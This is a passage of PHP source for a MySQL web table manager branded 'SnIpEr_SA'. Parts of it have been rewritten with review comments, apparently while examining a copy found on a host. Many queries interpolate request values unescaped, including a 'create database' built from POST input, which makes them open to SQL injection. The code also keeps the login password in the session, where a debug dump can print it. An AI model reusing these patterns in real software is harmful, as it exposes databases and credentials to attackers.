                //$result=mysql_query("Select * from $tablename");
                $num = mysql_num_fields($result);
                $fields = mysql_list_fields($dbname, $tablename);
                $whr="where ";
                $tok=explode(" ",$searchval);
                for ($t =0; $t < count($tok); $t++){
                        for ( $c = 0; $c < $num; $c++){
                                $fn =mysql_field_name($fields, $c);
                                $whr .=" $fn like '%$tok[$t]%' or ";
                        }
                }
                $whr=trim(substr_replace($whr, " ", -3));
                $query="Select * from $tablename $whr";
                $result=exequery($query, $tablename, $dbname);
                return $result;
        }
}
 723 //*********************GOTO buttons*************************
 724 //provides a form and button.
// Print a one-button POST form.
//   $tablename, $dbname - emitted as hidden fields unless $name contains 'tablestart'
//   $action             - form target
//   $class, $name, $va  - CSS class, field name and caption of the submit button
// All values are written into the markup unescaped.
// NOTE(review): `goto` has been a reserved word since PHP 5.3, so a declaration with this name
// would not parse there. That matters when judging whether a copy found on a host could have
// executed as published.
function goto($tablename, $dbname, $action, $class, $name, $va ){
        //Adds a button.
        echo"<form action='$action' method='post' >\n";
                if(! eregi('tablestart', $name)){
                        echo"<input type=hidden name=dbname value='$dbname' />\n";
                        echo"<input type=hidden name=tablename value='$tablename' />\n";
                }
                echo"<input class=$class type=submit  value='$va' name='$name' />\n";
                //echo"<input class=$class type=submit  value='$action' name=$name>";
        echo"</form>\n";
        //echo"<a class=$class href=$action>$va</a>";
        //}
}
 738 //*********************** ShowDB ***********************************
// Database overview page: when a MySQL connection can be opened, print a form that posts a
// new database name ('ndbname', submit field 'cndb'), followed by the list of databases
// returned by dbrestrict() and rendered by showdbs().
// $action is an unset local here, so the form's action attribute is rendered empty.
function showdb(){
//function showdb($backuppath){
        $link=connectmysql();
        if ($link){
        echo"<div class='db'>";
                echo"<div class='cream'>\n";
                echo"<h2 class=h >????? ????? ?????</h2>\n";
                echo"<form name=cdb action='$action' method='post' >\n";
                echo"??? ??????? ???????: <input type=text name=ndbname />\n";
                echo"<br /><br /><input class=but type='submit' name='cndb' value='????? ????? ?????' />\n";
                echo"</form><br />";
                echo"</div>";
                echo"<h2 class=h >????? ??????? ????????</h2>\n";
                //Restrict the database for users
        $dbnamearray= dbrestrict();
        showdbs($dbnamearray);
        echo"</div>";
           }
}
 758 //********************** BuildWhr ******************************
 759 //Builds the Where part of queries.
// Build the condition part of a WHERE clause from parallel arrays of key column names ($pk)
// and key values ($pv): "col='val' and col='val' ...". The number of terms follows count($pv).
// Names and values are concatenated without escaping.
// The final test compares against a single space while $whr starts as the empty string, so an
// empty $pv returns "" rather than false.
function buildwhr($pk, $pv){
        $whr="";
        $pn =count($pv);
        for($t =0; $t < $pn; $t++){
                $whr.="$pk[$t]='$pv[$t]'";
                if($t < $pn-1){
                        $whr.=" and ";
                }
        }
        if ($whr !=" "){
                return $whr;
        }else{
                return false;
        }
}
 775 //***********************ADD Record ******************
// Insert one row into $tablename. $array holds one entry per column, in column order; an entry
// that is itself an array (multiple selections for a SET column) is joined with commas.
// A SELECT * is run first only to learn the column count. Each value goes through AddSlashes()
// and is wrapped in single quotes; the table name is concatenated as given.
// Returns the result of the INSERT, or false when it failed.
function addrecord($tablename, $dbname, $array){
     $result=exequery("Select * from $tablename", $tablename, $dbname);
        //$result = @mysql_query( "Select * from $tablename" );
        $flds = mysql_num_fields($result);
        //$fields = mysql_list_fields($dbname, $tablename);
           $qry=" ";
    $query = "Insert into $tablename Values( ";
        for ($x =0; $x < $flds; $x++){
        //Multiple Select values for SET
       if(is_array($array[$x])){
            $mval="";
            for($m=0; $m < count($array[$x]); $m++){
                // No trailing comma after the last selected value.
                if($m+1 == count($array[$x])){
                    $mval.= AddSlashes($array[$x][$m]);
                }else{
                    $mval.= AddSlashes($array[$x][$m]).",";
                }
                $fval = $mval;
            }
        }else{
                    $fval = AddSlashes($array[$x]);
        }
                $qry .= "'$fval'";
                if ($x < $flds-1){
                        $qry.= ", ";
                }
        }
        $query .= $qry.")";
   // echo"qry: $qry";
        $result=exequery($query, $tablename, $dbname);
        if($result){
                return $result;
        }else{
                return false;
        }
}
 812 //**********************ADD Form **********************
 813 function addform($tablename, $dbname){
 814  //Display the field names and input boxes
 815  echo"<form action='$action' method='post'>\n";
 816  echo"<table border=0 width='100%' align='center'>\n";
 817  echo"<tr class=head><td>Field Name</td><td>Type</td><td>Value</td></tr>\n";
 818   $result=exequery("Select * from $tablename", $tablename, $dbname);
 819  //$result = @mysql_query( "Select * from $tablename" );
 820  $flds = mysql_num_fields($result);
 821  $fields = mysql_list_fields($dbname, $tablename);
 822  echo"<input type=hidden name=tablename value='$tablename' />\n";
 823  echo"<input type=hidden name='dbname' value='$dbname' />\n";
 824  echo"<tr>\n";
 825  $mxlen = 80;//max width of the form fields.
 826  for($i=0; $i < $flds; $i++){
 827       $auto = "false";
 828       echo "<th>".mysql_field_name($fields, $i);
 829       $fieldname = mysql_field_name($fields, $i);  // added
 830       $type  = mysql_field_type($result, $i);
 831       $flen = mysql_field_len($result, $i);//length of the field
 832       $flagstring = mysql_field_flags ($result, $i);
 833     // Start of new code for set drop down
 834       $newsql = "show columns from $tablename like '%".$fieldname."'";
 835       $newresult = exequery($newsql, $tablename, $dbname);
 836       //mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error());
 837       $arr=mysql_fetch_array($newresult);
 838     // End of new code block for set drop down
 839       if (eregi("primary",$flagstring )){
 840        $type .= " PK ";
 841       }
 842       if(eregi("auto",$flagstring )){
 843        $type .= " auto_increment";
 844        $auto = "true";
 845       }
 846       if ($auto=="true"){
 847         echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' value=0 /></td></tr>\n";
 848       }elseif($flen > $mxlen){
 849         $rws= $flen/$mxlen;
 850         if($rws>10){
 851              $rws=10; //max length of textarea
 852         }
 853         echo"<td>$type</td><td><textarea name='array[$i]' rows=$rws cols=$mxlen></textarea></td></tr>\n";
 854         // Start of new code for set drop down
 855       }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
 856        $num=substr_count($arr[1],',') + 1;  // count the number of entries
 857        $pos=strpos($arr[1],'(' ); //find the position of '('
 858        $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
 859        $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
 860        $nnewstring=explode(',',$snewstring,$num); // stick into an array
 861        if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
 862            echo "<td>Set (select one or more)</td>";
 863            echo"<td><select name='array[$i][]' size='3' multiple>";
 864        }else{//Enum one value only
 865         echo "<td>Enum</td>";
 866            echo"<td><select name='array[$i]'>";
 867        }
 868        for($y=0; $y<$num;$y++){
 869        echo"<option value=$nnewstring[$y]>$nnewstring[$y]";
 870        }
 871         echo"</select></td></tr>\n";
 872     // End of new code block for set drop down
 873       }else{
 874        echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' /></td></tr>\n";
 875       }
 876  }
 877  echo"<tr><td><input class=but type=submit name='addrec' value='Add Record' /></td>\n";
 878  echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
 879  echo"</tr>";
 880  echo"</table>\n";
 881  echo"</form>\n";
 882 }
 883 
 884 //*********************Edit Form ***************
 885 function editform($tablename, $dbname, $result, $edit, $pk, $pv){
 886         $row=mysql_fetch_array($result);
 887         echo"<form action='$action'  method=post>\n";
 888         echo"<table border=0 width ='100%' align='center'>\n";
 889         $flds = mysql_num_fields($result);
 890         $fields = mysql_list_fields($dbname, $tablename);
 891         echo"<input type=hidden name=tablename value='$tablename' />\n";
 892         echo"<input type=hidden name='dbname' value='$dbname' />\n";
 893         echo"<tr>";
 894         $mxlen = 80;//max width of the form fields
 895         for($i=0; $i < $flds; $i++){
 896         $fname=mysql_field_name($fields, $i);
 897                 echo "<th>$fname";
 898                  $flen = mysql_field_len($result, $i);//length of the field
 899                 $nslash = StripSlashes($row[$i]);
 900         // Start of new code for set drop down
 901       $newsql = "show columns from $tablename like '%".$fname."'";
 902       $newresult = exequery($newsql, $tablename, $dbname);
 903       $arr=mysql_fetch_array($newresult);
 904     // End of new code block for set drop down
 905                 if($flen > $mxlen){
 906                         $rws= $flen/$mxlen;
 907                                 if($rws>10){
 908                                 $rws=10; //max length of textarea
 909                         }
 910                         echo"<td><textarea name='array[$i]' rows=$rws cols=$mxlen>$nslash</textarea></td></tr>\n";
 911 // Start of new code for set drop down
 912           }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
 913            $num=substr_count($arr[1],',') + 1;  // count the number of entries
 914            $pos=strpos($arr[1],'(' ); //find the position of '('
 915            $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
 916            $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
 917            $nnewstring=explode(',',$snewstring,$num); // stick into an array
 918            if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
 919                echo"<td><select name='array[$i][]' multiple size='3'>";
 920            }else{//Enum one value only
 921                echo"<td><select name='array[$i]'>";
 922            }
 923            $nsel=explode(",",$nslash);
 924           for($y=0; $y<$num;$y++){
 925                 //geteach value 'a,b,c'
 926                 $sel="";
 927                 for($e=0; $e<count($nsel);$e++){
 928                     if($nnewstring[$y]=="'".$nsel[$e]."'"){
 929                         $sel="selected";
 930                     }
 931                 }
 932                 echo"<option value=$nnewstring[$y] $sel>$nnewstring[$y]";
 933            }
 934             echo"</select></td></tr>\n";
 935 // End of new code block for set drop down
 936 
 937         }else{
 938                         echo"<td><input type=text name='array[$i]' size='$flen' value='$nslash' /></td></tr>\n";
 939                 }
 940                 for($f =0; $f< count($pk);$f++){
 941                         echo"<input type=hidden name=pk[$f] value='$pk[$f]' />";
 942                         echo"<input type=hidden name=pv[$f] value='$pv[$f]' />\n";
 943                 }
 944         }
 945         echo"<tr><td><input class=but type=submit name='editrec' value='Update' /></td>\n";
 946         echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
 947         echo"</tr>";
 948         echo"</table>\n";
 949         echo"</form>\n";
 950 }
 951 //************************Edit Record*************************
 952 function editrec($dbname, $tablename, $pk, $pv, $array){
 953         //$result = @mysql_query( "Select * from $tablename" );
 954     $result = exequery("Select * from $tablename", $tablename, $dbname);
 955         $flds = mysql_num_fields($result);
 956         $fields = mysql_list_fields($dbname, $tablename);
 957 //Build Query
 958            $qry="";
 959     $query = "UPDATE $tablename set ";
 960         for ($x =0; $x < $flds; $x++){
 961                 $fie = mysql_field_name($fields, $x );
 962         // SET and ENUM
 963          if(is_array($array[$x])){
 964             $mval="";
 965             for($m=0; $m < count($array[$x]); $m++){
 966                 if($m+1 == count($array[$x])){
 967                     $mval.= AddSlashes($array[$x][$m]);
 968                 }else{
 969                     $mval.= AddSlashes($array[$x][$m]).",";
 970                 }
 971                 $fval = $mval;
 972             }
 973         }else{
 974                     $fval = AddSlashes($array[$x]);
 975         }
 976         //**************************
 977                 //$fval = AddSlashes($array[$x]);
 978                 $qry .= "$fie = '$fval'";
 979                 if ($x < $flds-1){
 980                         $qry.= ", ";
 981                 }
 982         }
 983         $whr = buildwhr( $pk, $pv);
 984         $whr =StripSlashes($whr);
 985         $query .= "$qry";
 986         $query .= " where $whr";
 987     $result=exequery($query, $tablename, $dbname);
 988         if($result){
 989                 return $result;
 990         }else{
 991                 return false;
 992         }
 993 }
 994 //****************** Number of Primary Keys ***********************
 995 function numpk($result){
 996         $z =0;
 997         for ($i = 0; $i < $flds; $i++) {
 998                 //Find the primary key
 999                 $flagstring = mysql_field_flags ($result, $i);
1000                 if(eregi("primary",$flagstring )){
1001                         $z++;
1002                 }
1003         }
1004         return $z;
1005 }
1006 //********************Size field*****************
/**
 * Print the "length" input that goes with a column type in a table-definition form.
 *
 * The type name is compared case-insensitively after trimming. Date/time types
 * print nothing, text/blob types print a hidden input, integer types and any
 * unrecognised type print a short text box, YEAR prints a 4/2 selector and
 * SET/ENUM print a free-text box for the member list.
 *
 * NOTE(review): $i and $l are written into the markup as-is.
 *
 * @param string $ft column type name
 * @param mixed  $i  index used in the input name leng[$i]
 * @param mixed  $l  current length value
 * @return void
 */
function fieldformsize($ft, $i, $l){
    $kind = trim(strtoupper($ft));
    switch ($kind) {
        case "DATE":
        case "TIME":
        case "DATETIME":
            // No length applies to these types.
            break;

        case "TINYTEXT":
        case "BLOB":
        case "TEXT":
        case "MEDIUMBLOB":
        case "MEDIUMTEXT":
        case "LONGBLOB":
        case "LONGTEXT":
        case "TINYBLOB":
            echo "<input type=hidden name='leng[$i]' value=$l>";
            break;

        case "INT":
        case "TINYINT":
        case "SMALLINT":
        case "MEDIUMINT":
        case "BIGINT":
        case "INTEGER":
            echo "<input type=text name='leng[$i]' size=5  value=$l>";
            break;

        case "YEAR":
            echo "<select name='leng[$i]'>";
            echo "<option value='4'>4";
            echo "<option value='2'>2";
            echo "</select>\n";
            break;

        case "SET":
        case "ENUM":
            echo "<input type=text name='leng[$i]' title='values eg \"a\", \"b\", \"c\"' value='' />";
            break;

        default:
            echo "<input type=text name='leng[$i]' size=5 value=$l />\n";
    }
}
1027 //******************************Display Row ******************************
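/**
 * Print one result row as an HTML table row, preceded by an "Edit Record" and a
 * "Delete Record" form that carry the row's key as hidden pk[]/pv[] inputs.
 *
 * When $cpk > 0 and $pkfield is non-empty the key is the listed columns;
 * otherwise every column of the table is used as the key.
 *
 * Cell values, key values and the database/table names are HTML-escaped before
 * output. The original wrote row content into the page as-is, so markup stored
 * in a table was rendered by the browser of whoever viewed it.
 *
 * @param string $dbname  database name
 * @param string $tbl     table name
 * @param mixed  $pk      not used by this function
 * @param array  $pkfield names of the key columns
 * @param int    $cpk     number of key columns
 * @param array  $row     row data, addressable by column index and by column name
 * @param int    $flds    number of columns in the row
 * @return void
 */
function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){
    // $action was never defined in this scope, so both forms have always posted
    // back to the current URL; that is made explicit here.
    $action = '';
    // ISO-8859-1 is named so that non-ASCII bytes pass through unvalidated: the
    // page declares windows-1256, which htmlspecialchars() does not accept by name.
    $dbHtml  = htmlspecialchars((string) $dbname, ENT_QUOTES, 'ISO-8859-1');
    $tblHtml = htmlspecialchars((string) $tbl, ENT_QUOTES, 'ISO-8859-1');
    $cpkHtml = htmlspecialchars((string) $cpk, ENT_QUOTES, 'ISO-8859-1');

    $hv = "";
    $hf = "";
    if ($cpk > 0 && !empty($pkfield)) {
        for ($a = 0; $a < $cpk; $a++) {
            $fieldn = $pkfield[$a];
            $keyval = isset($row[$fieldn]) ? (string) $row[$fieldn] : '';
            $hf .= "<input type=hidden name=pk[$a] value='" . htmlspecialchars((string) $fieldn, ENT_QUOTES, 'ISO-8859-1') . "' />";
            $hv .= "<input type=hidden name=pv[$a] value='" . htmlspecialchars($keyval, ENT_QUOTES, 'ISO-8859-1') . "' />";
        }
    } else { //No Primary Key so use all fields
        $fields = mysql_list_fields($dbname, $tbl);
        for ($b = 0; $b < $flds; $b++) {
            $fie = mysql_field_name($fields, $b);
            $keyval = isset($row[$b]) ? (string) $row[$b] : '';
            $hf .= "<input type=hidden name=pk[$b] value='" . htmlspecialchars((string) $fie, ENT_QUOTES, 'ISO-8859-1') . "' />";
            $hv .= "<input type=hidden name=pv[$b] value='" . htmlspecialchars($keyval, ENT_QUOTES, 'ISO-8859-1') . "' />";
        }
    }

    echo "<tr>\n";
    //edit Record
    echo "<td><form action='$action' method=post>\n";
    echo "<input type=hidden name=dbname value='$dbHtml' />\n";
    echo "<input type=hidden name=tablename value='$tblHtml' />\n";
    echo "<input type=hidden name=npkeys value='$cpkHtml' />\n";
    echo $hf;
    echo $hv;
    echo "<input class=sml type=submit name=edit value='Edit Record' />\n";
    echo "</form></td>\n";
    //Delete record
    echo "<td><form action='$action' method=post>\n";
    echo "<input type=hidden name=dbname value='$dbHtml' />\n";
    echo "<input type=hidden name=tablename value='$tblHtml' />\n";
    echo "<input type=hidden name=num value='$cpkHtml' />\n";
    echo $hf;
    echo $hv;
    echo "<input class=smldel type=submit name=delete value='Delete Record' />\n";
    echo "</form></td>";
    //Display all the columns.
    for ($col = 0; $col < $flds; $col++) {
        $nslash = stripslashes(isset($row[$col]) ? (string) $row[$col] : '');
        echo "<td>" . htmlspecialchars($nslash, ENT_QUOTES, 'ISO-8859-1') . "</td>";
    }
    echo "</tr>";
}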
1072 //***********************Remove Array Copy********************************
1073 //removes copies from an array $x.
/**
 * Return the values of $x sorted ascending with duplicates dropped.
 *
 * Two values count as duplicates when they are equal under PHP's loose (==)
 * comparison. The result is re-indexed from 0.
 *
 * @param array $x values to de-duplicate (the caller's array is not modified)
 * @return array sorted, de-duplicated values
 */
function removearraycopy($x){
    sort($x);
    $unique = array();
    foreach ($x as $candidate) {
        // Non-strict in_array() applies the same == test the original loop used.
        if (!in_array($candidate, $unique)) {
            $unique[] = $candidate;
        }
    }
    return $unique;
}
1091 //***********************<< page position >>********************************
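/**
 * Print the "records per page" form and return the page-navigation markup.
 *
 * The form is echoed directly; the navigation block (first / back / page box /
 * next / last) is returned as a string and is empty when there is at most one
 * page.
 *
 * Changes against the original:
 *  - three of the four links had the literal text 'action' in the href instead
 *    of the $action variable, which produced a broken attribute;
 *  - $tablename, $searchval and $pagemax reach this function from the request
 *    in the visible calling code and were written into attributes and URLs
 *    as-is; they are now HTML-escaped or URL-encoded for the context they land in;
 *  - a zero or non-numeric $pagemax no longer causes a division by zero.
 *
 * @param int    $num_rows  total number of records
 * @param int    $pagemax   records per page
 * @param int    $pg        current page, zero-based
 * @param string $tablename table being paged
 * @param string $searchval current search term, or ""
 * @return string HTML for the page navigation, or "" for a single page
 */
function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){
    // $action was never defined in this scope, so forms and links have always
    // targeted the current URL; that is made explicit here.
    $action = '';
    //round up the number of pages.
    $pgs = (is_numeric($pagemax) && $pagemax > 0) ? (int) ceil($num_rows / $pagemax) : 0;
    $pg = (int) $pg;

    // ISO-8859-1 is named so that non-ASCII bytes pass through unvalidated: the
    // page declares windows-1256, which htmlspecialchars() does not accept by name.
    $tblAttr    = htmlspecialchars((string) $tablename, ENT_QUOTES, 'ISO-8859-1');
    $searchAttr = htmlspecialchars((string) $searchval, ENT_QUOTES, 'ISO-8859-1');
    $maxAttr    = htmlspecialchars((string) $pagemax, ENT_QUOTES, 'ISO-8859-1');
    $tblUrl     = urlencode((string) $tablename);

    echo "<form action='$action' id='recspage' method='post' name='recspage'>\n";
    echo "Total number of records $num_rows, displayed on $pgs pages of \n";
    echo "<input type='text'  name='pagemax' value='$maxAttr' size='4' onchange='javascript:this.form.submit();' title='Type the number records to display on a page then click outside the box' /> \n";
    echo "<input type='hidden' name='searchval' value='$searchAttr'  />\n";
    echo "<input type='hidden' name='tablename' value='$tblAttr'  />\n";
    echo "records per page.</form> \n";

    $pagescrol = "";
    if ($pgs > 1) {
        $nxt   = $pg + 1;
        $bk    = $pg - 1;
        $lst   = $pgs;
        $end   = $lst - 1;
        $showp = $pg + 1; // page number shown to the user is one-based
        $sval  = "";
        if ($searchval != "") {
            $sval = "&amp;searchval=" . urlencode((string) $searchval);
        }
        $base = "$action?tablename=$tblUrl&amp;pg=";

        $pagescrol  = "<div class='pagecount'>\n";
        $pagescrol .= "<form name='pages' id='pages' action='$action' method='get'>\n";
        if ($pg >= 1) {
            $pagescrol .= " <a href='{$base}0$sval' title='To first page'> 1 :&lt;&lt; </a> \n";
            $pagescrol .= " <a href='$base$bk$sval' title='Back one page'> &lt; </a> \n";
        }
        $pagescrol .= "<input type='text' name='pg' value='$showp' size='4' onchange='javascript:this.form.submit();' title='Type a page number then click outside the box' />\n";
        $pagescrol .= "<input type='hidden' name='pback' value='true'  />\n";
        $pagescrol .= "<input type='hidden' name='searchval' value='$searchAttr'  />\n";
        $pagescrol .= "<input type='hidden' name='tablename' value='$tblAttr'  />\n";
        if ($showp < $lst) {
            $pagescrol .= " <a href='$base$nxt$sval' title='Next page'> &gt; </a> \n";
            $pagescrol .= " <a href='$base$end$sval' title='To Last page'> &gt;&gt;: $lst</a> \n";
        }
        $pagescrol .= "</form>\n";
        $pagescrol .= "</div>\n";
    }
    return $pagescrol;
}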
1132 //*************Display Footer*************************
1133 //Please don't remove or change.
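/**
 * Print the page footer: version, current year and the author link.
 *
 * @return void
 */
function display_foot(){
    // $version is assigned at file scope; without this declaration the function
    // read an undefined local and always printed an empty version.
    global $version;
    echo "<div class='foot'>Version $version &copy; ".date('Y')." <a style='text-decoration:none;' target='_blank' href='http://www.SnIpEr-SA.com'>SnIpEr_SA</a></div>";
}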
1137 //*************My Size*************************
1138 //Returns the size of a table or database
/**
 * Report the size of one table, or of a whole database, as an HTML fragment.
 *
 * Runs SHOW TABLE STATUS on $dbname (restricted with LIKE when $tablename is
 * non-empty) and sums Data_length + Index_length over the rows returned.
 *
 * NOTE(review): both names are interpolated into the SQL text as-is; the
 * visible callers pass session and request values, so the statement must be
 * treated as injectable.
 *
 * @param string $dbname    database to inspect
 * @param string $tablename table name, or "" for every table in the database
 * @return string "<span class='bytes'>N bytes</span>", or "Unknowen" when the query fails
 */
function mysize($dbname, $tablename){
    $filter = ($tablename != "") ? " like '$tablename'" : "";
    $status = exequery("SHOW TABLE STATUS FROM $dbname $filter", $tablename, $dbname);
    if (!$status) {
        return "Unknowen";
    }

    $bytes = 0;
    while ($rec = mysql_fetch_array($status)) {
        $bytes += $rec['Data_length'] + $rec['Index_length'];
    }
    return "<span class='bytes'>$bytes bytes</span>";
}
1159 
1160 //**************************************
1161 //DEBUG to show all being passed to the page
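/**
 * DEBUG helper: print every GET, POST and session variable as "name: value, ".
 *
 * Names and values are HTML-escaped before output; the original echoed request
 * data straight into the page. A missing session is treated as empty instead
 * of being iterated, and array values are printed as "Array".
 *
 * NOTE(review): the visible login code stores the submitted password in
 * $_SESSION['password'], so this dump discloses it to anyone who can see the
 * page. It should not be reachable outside a debugging session.
 *
 * @return void
 */
function showpassingvars(){
    $sources = array(
        'Get'     => $_GET,
        'Post'    => $_POST,
        'Session' => isset($_SESSION) ? $_SESSION : array(),
    );
    $separator = '';
    foreach ($sources as $label => $vars) {
        echo $separator . $label . ": ";
        $separator = "<br>";
        foreach ($vars as $pram => $value) {
            // Same text the original's string conversion produced for arrays.
            $text = is_array($value) ? 'Array' : (string) $value;
            // ISO-8859-1 is named so that non-ASCII bytes pass through unvalidated:
            // the page declares windows-1256, which htmlspecialchars() does not accept by name.
            echo htmlspecialchars((string) $pram, ENT_QUOTES, 'ISO-8859-1')
                . ": "
                . htmlspecialchars($text, ENT_QUOTES, 'ISO-8859-1')
                . ", ";
        }
    }
}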
1176 echo"<html>\n";
1177 echo"<meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>\n";
1178 echo"<head>\n";
1179 echo"<title>????? ??????? ?????? ????????</title>\n";
1180 echo"<STYLE>
1181 BODY
1182  {
1183         SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
1184 }
1185 tr {
1186 BORDER-RIGHT:  #cccccc ;
1187 BORDER-TOP:    #cccccc ;
1188 BORDER-LEFT:   #cccccc ;
1189 BORDER-BOTTOM: #cccccc ;
1190 color: #ffffff;
1191 }
1192 td {
1193 BORDER-RIGHT:  #cccccc ;
1194 BORDER-TOP:    #cccccc ;
1195 BORDER-LEFT:   #cccccc ;
1196 BORDER-BOTTOM: #cccccc ;
1197 color: #cccccc;
1198 }
1199 .table1 {
1200 BORDER: 1;
1201 BACKGROUND-COLOR: #000000;
1202 color: #333333;
1203 }
1204 .td1 {
1205 BORDER: 1;
1206 font: 7pt tahoma;
1207 color: #ffffff;
1208 }
1209 .tr1 {
1210 BORDER: 1;
1211 color: #cccccc;
1212 }
1213 table {
1214 BORDER:  #eeeeee  outset;
1215 BACKGROUND-COLOR: #000000;
1216 color: #cccccc;
1217 }
1218 input {
1219 BORDER-RIGHT:  #990000 1 solid;
1220 BORDER-TOP:    #990000 1 solid;
1221 BORDER-LEFT:   #990000 1 solid;
1222 BORDER-BOTTOM: #990000 1 solid;
1223 BACKGROUND-COLOR: #333333;
1224 font: 9pt tahoma;
1225 color: #ffffff;
1226 }
1227 select {
1228 BORDER-RIGHT:  #ffffff 1 solid;
1229 BORDER-TOP:    #999999 1 solid;
1230 BORDER-LEFT:   #999999 1 solid;
1231 BORDER-BOTTOM: #ffffff 1 solid;
1232 BACKGROUND-COLOR: #000000;
1233 font: 9pt tahoma;
1234 color: #CCCCCC;;
1235 }
1236 submit {
1237 BORDER:  buttonhighlight 1 outset;
1238 BACKGROUND-COLOR: #272727;
1239 width: 40%;
1240 color: #cccccc;
1241 }
1242 textarea {
1243 BORDER-RIGHT:  #ffffff 1 solid;
1244 BORDER-TOP:    #999999 1 solid;
1245 BORDER-LEFT:   #999999 1 solid;
1246 BORDER-BOTTOM: #ffffff 1 solid;
1247 BACKGROUND-COLOR: #333333;
1248 font: Fixedsys bold;
1249 color: #ffffff;
1250 }
1251 BODY {
1252 margin: 1;
1253 color: #cccccc;
1254 background-color: #000000;
1255 }
1256 A:link {COLOR:red; TEXT-DECORATION: none}
1257 A:visited { COLOR:red; TEXT-DECORATION: none}
1258 A:active {COLOR:red; TEXT-DECORATION: none}
1259 A:hover {color:blue;TEXT-DECORATION: none}
1260 </STYLE>\n";
1261 echo"<meta http-equiv='Content-Type' content='text/html charset=windows-1256'>";
1262 echo"<title>????? ??????? ?????? ????????</title>\n";
1263 echo"<meta name='author' content='Tony Aslett'>";
1264 echo"<meta name='title' content='PHP:MySQL Table Manager'>";
1265 echo"<meta name='description' content='Table Manager for MySQL Database'>";
1266 echo"<link rel='stylesheet' href='tmgrstyles.css' type='text/css'>\n";
1267 echo"</head>\n";
1268 echo"<body>\n";
1269 $showall=true;
1270 echo"<h2 class=h >????? ??????? ?????? ????????</h2>\n";
1271 //******************* Session Logon ***********************
1272 if(isset($_POST['logout'])){
1273                 $_POST['dbname']="";
1274                 session_unset();
1275                 session_destroy();
1276 }
1277 if(isset($_POST['userid']) && isset($_POST['pword1'])){
1278         $_SESSION['user'] = $_POST['userid'];
1279         $_SESSION['password'] = $_POST['pword1'];
1280 }
1281 if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){
1282         echo"<div align=center>";
1283         echo"<h2>???? ?????? ??????? ???????</h2>\n";
1284         If(!isset($dbnamearray)){
1285                 $dbnamearray="";
1286         }
1287         show_login($dbnamearray);
1288         echo"</div>";
1289 }else{
1290         //show logout option.
1291         echo"<div align=right>";
1292         endsess();
1293         echo"</div>";
1294 }
1295 //*****dbname
1296 if(isset($_POST['dbname'])){
1297         $dbname=$_POST['dbname'];
1298     $_SESSION['dbname']= $_POST['dbname'];
1299 }
1300 //***** Host
1301 if(isset($_POST['host'])){
1302     $host=$_POST['host'];
1303     $_SESSION['host']=$_POST['host'];
1304 }
1305 //******set tablename
1306 if(isset($_GET['tablename']) ){
1307         $tablename=$_GET['tablename'];
1308 }elseif(isset($_POST['tablename'])){
1309         $tablename=$_POST['tablename'];
1310 }
1311 //********** pagemax
1312 if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){
1313     $isnum=true;
1314     for($o=0; $o<count($_POST['pagemax']); $o++){
1315             if($_POST['pagemax'][$o]>9){
1316                 $isnum=false;
1317             }
1318     }
1319     if($_POST['pagemax']>0 && $isnum){
1320         $_SESSION['pagemax']=$_POST['pagemax'];
1321     }
1322 }
1323  if(isset($_SESSION['pagemax'])){
1324     $pagemax=$_SESSION['pagemax'];
1325  }
1326 //******** create a new Database ************
1327 if(isset($_POST['cndb'])){
1328     connectmysql();
1329         $sql="create database $_POST[ndbname]";
1330         $result=exequery($sql, " ", $_POST['ndbname']);
1331         if ($result){
1332                 $_SESSION['dbname'] = $_POST['ndbname'];
1333         $sql="Use $_POST[ndbname]";
1334             $result=exequery($sql, " ", $_POST['ndbname']);
1335         if($result){
1336             echo"<h2>????? ????? $_SESSION[dbname] </h2>\n";
1337         }
1338         }
1339 }
1340 //*********************************************
1341 if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post
1342         //Databse names
1343         showdb();
1344 }
1345 //************************ Choose DB *************
1346 if(isset($_POST['dbname']) && $_POST['dbname']==""){
1347     showdb();
1348 }
1349 //**********
1350 if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){
1351 //*************************************
1352                 //connection
1353                 if (isset($_SESSION['dbname'])){
1354                         $dbsetname = $_SESSION['dbname'];
1355                 }elseif(isset($_POST['dbname'])){
1356                         $dbsetname = $_POST['dbname'];
1357                         $_SESSION['dbname'] = $_POST['dbname'];
1358                 }else{
1359                         $dbsetname = $_POST['dbna'];
1360                         $_SESSION['dbname'] = $_POST['dbna'];
1361                 }
1362 }
1363 //*************************** we have a DB set
1364 if(isset($dbsetname) && $dbsetname!=""){
1365                     $link= connectmysql();
1366             //echo"DBS: $dbsetname";
1367                     $conn = connectdb($dbsetname, $link);
1368 //*********** Drop Table **************
1369         if(isset($_POST['deltable'])){
1370         $showall=false;
1371                 $tablename=$_POST['tablename'];
1372                 echo"<h1>!!! ????? !!! <br>??? ????? ??? ??? ?????? $tablename<br>";
1373                 echo"?? ??? ????? ?? ?????? ??????????</h1>\n";
1374                 $va="Drop $tablename";
1375                 goto($tablename, $dbname,$action, 'del', 'droptab', $va );
1376         }
1377         if(isset($_POST['droptab'])){
1378                 $tablename=$_POST['tablename'];
